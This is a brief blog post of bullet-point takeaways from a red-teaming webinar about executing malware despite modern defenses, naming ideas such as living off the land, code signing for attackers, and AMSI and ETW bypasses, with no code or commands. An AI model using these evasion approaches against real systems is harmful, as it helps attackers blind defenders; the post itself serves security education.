December 3

Webinar takeaway: Move Aside Script Kiddies: Malware Execution in the Age of Advanced Defenses

0  comments

file

My key takeaways

  • it’s getting harder to execute malware in a lot of environments, also due to endpoint maturity
  • 3 parts of an assumed compromise: priv esc, lateral movement, senstive data access
  • Win10 is safer then ever, also Windows Defender has improved
  • defense vendors have signatures for almost all metaspoilt machine code
  • nowadays you can’t use a commodity framework and get away with it as an attacker/red teamer
  • code signing becomes also relevant for red teamers to get malware run
  • live of the land becomes more and more mandatory (LOLBAS)
  • Best EDR? Manually…!
  • "blinding the defenders": AMSI amusements and ETW bypass

Env


Tags

malware, red teaming, reverse shell


You may also like

Webinar takeaway – Offensive Windows Event Logs

Webinar takeaway – Offensive Windows Event Logs

Webinar takeaway – A Master Class on Offensive MSBuild

Webinar takeaway – A Master Class on Offensive MSBuild
{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}